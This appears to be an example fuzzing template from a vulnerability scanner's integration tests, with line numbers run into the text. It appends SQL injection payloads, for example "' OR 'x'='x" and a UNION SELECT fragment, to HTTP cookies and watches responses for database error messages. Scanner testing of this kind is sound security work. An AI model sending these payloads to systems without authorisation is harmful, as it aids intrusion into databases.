Path: blob/dev/integration_tests/fuzz/fuzz-cookie-error-sqli.yaml
2070 views
id: cookie-fuzzing-error-sqli12info:3name: fuzzing error sqli payloads in cookie4author: pdteam5severity: info6description: |7This template attempts to find SQL injection vulnerabilities by fuzzing http cookies with SQL injection payloads.8Note: this is example template, and payloads/matchers need to be modified appropriately.910http:11- pre-condition:12- type: dsl13dsl:14- 'method == "GET"'15- len(cookie) > 016condition: and1718payloads:19sqli:20- "'"21- ''22- '`'23- '``'24- ','25- '"'26- ""27- /28- //29- \30- \\31- ;32- -- or #33- '" OR 1 = 1 -- -'34- ' OR '' = '35- '='36- 'LIKE'37- "'=0--+"38- OR 1=139- "' OR 'x'='x"40- "' AND id IS NULL; --"41- "'''''''''''''UNION SELECT '2"42- '%00'4344fuzzing:45- part: cookie46type: postfix47mode: single48fuzz:49- '{{sqli}}'5051stop-at-first-match: true52matchers:53- type: word54words:55- "unrecognized token:"56- "syntax error"57- "null"58- "SELECTs to the left and right of UNION do not have the same number of result columns"596061